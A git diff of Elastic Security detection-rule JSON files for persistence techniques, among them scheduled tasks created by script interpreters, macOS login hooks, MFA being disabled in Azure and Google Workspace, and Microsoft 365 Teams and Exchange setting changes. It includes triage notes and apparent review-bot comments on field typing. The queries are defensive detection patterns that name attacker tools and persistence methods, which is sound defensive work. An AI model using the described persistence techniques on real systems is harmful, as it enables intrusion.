index 8ac95785e10d3..20c5bd047f9c5 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json
@@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Local Scheduled Task Creation", "query": "sequence with maxspan=1m\n [process where event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n process.code_signature.trusted == false)] by process.entity_id\n [process where event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 21, 
"rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", "severity": "low", @@ -51,5 +98,5 @@ } ], "type": "eql", - "version": 12 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json index 1489cb58d0110..7a3181d5ad74c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json 
@@ -16,7 +16,44 @@ "license": "Elastic License v2", "name": "Scheduled Task Created by a Windows Script", "note": "## Triage and analysis\n\nDecode the base64 encoded Tasks Actions registry value to investigate the task's configured action.", - "query": "sequence by host.id with maxspan = 30s\n [library where dll.name : \"taskschd.dll\" and process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "sequence by host.id with maxspan = 30s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "689b9d57-e4d5-4357-ad17-9c334609d79a", "severity": "medium", @@ -52,5 +89,5 @@ } ], "type": "eql", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json
index ce729c1812824..8421f8e15fe0d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Persistence via Login or Logout Hook",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type == \"start\" and\n process.name == \"defaults\" and process.args == \"write\" and process.args in (\"LoginHook\", \"LogoutHook\") and\n not process.args :\n (\n \"Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"Support/JAMF/ManagementFrameworkScripts/loginhook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/loginhook.sh\"\n )\n",
 "references": [
 "https://www.virusbulletin.com/uploads/pdf/conference_slides/2014/Wardle-VB2014.pdf",
@@ -19,6 +19,7 @@
 ],
 "risk_score": 47,
 "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -46,5 +47,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json
index 0ec8607f4d71d..666d45c0f77c0 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json
@@ -12,10 +12,32 @@ "license": "Elastic License v2", "name": "Potential Persistence via Login Hook", "note": "## Triage and analysis\n\nStarting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. This can be abused to establish or maintain persistence on a compromised system.", - "query": "event.category:\"file\" and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor))\n", + "query": "event.category:\"file\" and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or \"iMazing Profile Editor\"\n))\n", "references": [ "https://github.com/D00MFist/PersistentJXA/blob/master/LoginScript.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ac412404-57a5-476f-858f-4e8fbb4f48d8", "severity": "medium", @@ -52,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json index 2514b5790d023..d24a8b6d5c3d6 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json
@@ -11,10 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Multi-Factor Authentication Disabled for an Azure User", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Multi-Factor Authentication Disabled for an Azure User\n\nMulti-factor authentication is a process in which users are prompted during the sign-in process for an additional form\nof identification, such as a code on their cellphone or a fingerprint scan.\n\nIf you only use a password to authenticate a user, it leaves an insecure vector for attack. If the password is weak or\nhas been exposed elsewhere, an attacker could be using it to gain access. When you require a second form of authentication,\nsecurity is increased because this additional factor isn't something that's easy for an attacker to obtain or duplicate.\n\nFor more information about using MFA in Azure AD, access the [official documentation](https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks#how-to-enable-and-use-azure-ad-multi-factor-authentication).\n\nThis rule identifies the deactivation of MFA for an Azure user account. 
This modification weakens account security\nand can lead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security defaults [provided by Microsoft](https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Disable Strong Authentication\" and event.outcome:(Success or success)\n", + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "dafa3235-76dc-40e2-9f71-1773b96d24cf", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json new file mode 100644 index 0000000000000..d30f58a7ca9e2 --- /dev/null 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_google_workspace_organization.json 
@@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when multi-factor authentication (MFA) is disabled for a Google Workspace organization. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "MFA settings may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "MFA Disabled for Google Workspace Organization", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ENFORCE_STRONG_AUTHENTICATION or ALLOW_STRONG_AUTHENTICATION) and google_workspace.admin.new_value:false\n", + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.new_value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e555105c-ba6d-481f-82bb-9b633e7b4827", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json
similarity index 53%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json
index 1b19f94bf898d..b4c103b079000 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_exchange_dkim_signing_config_disabled.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_dkim_signing_config_disabled.json
@@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange DKIM Signing Configuration Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Set-DkimSigningConfig\" and o365.audit.Parameters.Enabled:False and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/set-dkimsigningconfig?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.Enabled", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "514121ce-c7b6-474a-8237-68ff71672379", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -28,9 +67,27 @@ "Microsoft 365", "Continuous Monitoring", "SecOps", - "Data Protection" + "Data Protection", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } 
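Review bot: The new `required_fields` entry for `o365.audit.Parameters.Enabled` is typed `"unknown"` even though the query in the same hunk compares it to the literal `False`, so the metadata does not tell a reader whether the field is a boolean or a keyword in the o365 integration mapping. Resolving the type against the integration's field definition (for example `"type": "boolean"` if that is what the package maps it to) would make `required_fields` usable for the index-mapping check it presumably exists for; if it genuinely cannot be resolved, the commit description should say why. The same `"type": "unknown"` entries appear in the hunks at L2924 (`o365.audit.ModifiedProperties.Role_DisplayName.NewValue`), L2926 (`o365.audit.NewValue`), L2928 (`o365.audit.Parameters.AllowFederatedUsers`), L2929 (`o365.audit.Parameters.AllowGuestUser`) and L2942 (`winlog.event_data.AllowedToDelegateTo`).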
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json index 832677a04f32b..41e96cb645554 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_exchange_management_role_assignment.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Management Group Role Assignment", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json index 06bdfe65d515c..af515210c0017 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_global_administrator_role_assign.json @@ -11,13 +11,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Global Administrator Role Assigned", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", "references": [ "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,7 +72,7 @@ "subtechnique": [ { "id": "T1098.003", - "name": "Add Office 365 Global Administrator Role", + "name": "Additional Cloud Roles", "reference": "https://attack.mitre.org/techniques/T1098/003/" } ] @@ -53,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json similarity index 54% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json index c2074329fb5ab..f25c04642d119 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/microsoft_365_teams_custom_app_interaction_allowed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_custom_app_interaction_allowed.json 
@@ -14,13 +14,57 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams Custom Application Interaction Allowed", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:MicrosoftTeams and\nevent.category:web and event.action:TeamsTenantSettingChanged and\no365.audit.Name:\"Allow sideloading and interaction of custom apps\" and\no365.audit.NewValue:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoftteams/platform/concepts/deploy-and-publish/apps-upload" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Name", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.NewValue", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "bbd1a775-8267-41fa-9232-20e5582596ac", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -28,9 +72,21 @@ "Microsoft 365", "Continuous Monitoring", "SecOps", - "Configuration Audit" + "Configuration Audit", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
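Review bot: The added `threat` entry maps the rule to the Persistence tactic but leaves `"technique": []`, so the rule gains the `"Persistence"` tag with no ATT&CK technique behind it, unlike the sibling hunks on this page that pair TA0003 with a concrete technique. A tactic-only mapping may be deliberate for a tenant-setting change like this one, but the JSON cannot carry a comment saying so; either fill in the technique the tag is meant to reflect or state in the commit description that the empty `technique` array is intentional.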
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json index c622572b8a796..b75e8339a78bb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_external_access_enabled.json 
@@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams External Access Enabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json index 81af49294a639..82fdb6639ed7e 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_microsoft_365_teams_guest_access_enabled.json @@ -14,13 +14,52 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Teams Guest Access Enabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTeamsClientConfiguration\" and\no365.audit.Parameters.AllowGuestUser:True and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/skype/get-csteamsclientconfiguration?view=skype-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowGuestUser", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "5e552599-ddec-4e14-bad1-28aa42404388", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ml_linux_anomalous_process_all_hosts.json
similarity index 74%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_anomalous_process_all_hosts.json
